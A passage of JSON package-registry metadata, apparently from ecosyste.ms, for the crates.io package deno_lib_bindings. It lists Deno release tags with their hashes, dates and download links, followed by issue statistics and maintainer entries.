.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:01:27.332Z","dependent_packages_count":0,"downloads":1940,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":59.928333806831205,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":24.634879118064646},"purl":"pkg:cargo/deno_lib_bindings","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_lib_bindings","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_lib_bindings","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_lib_bindings/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T13:34:02.013Z","issues_count":6587,"pull_requests_count":9594,"avg_time_to_close_issue":17245043.705291007,"avg_time_to_close_pull_request":1537873.0327909887,"issues_closed_count":3778,"pull_requests_closed_count":7989,"pull_request_authors_count":568,"issue_authors_count":2458,"avg_comments_per_issue":2.5132837407013815,"avg_comments_per_pull_request":0.7158640817177403,"merged_pull_requests_count":6974,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":653,"past_year_pull_requests_count":1185,"past_year_avg_time_to_close_issue":1382328.9581395348,"past_year_avg_time_to_close_pull_request":1329735.605304212,"past_year_issues_closed_count":215,"past_year_pull_requests_closed_count":641,"past_year_pull_request_authors_count":174,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2159264931087288,"past_year_avg_comments_per_pull_request":1.0784810126582278,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":19,"past_year_merged_pull_requests_count":469,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1777,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":278,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":375,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib_bindings/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:28.472Z","updated_at":"2022-11-07T18:29:28.472Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:28.482Z","updated_at":"2022-11-07T18:29:28.482Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"},{"uuid":"50060","login":"afinch7","name":"andy 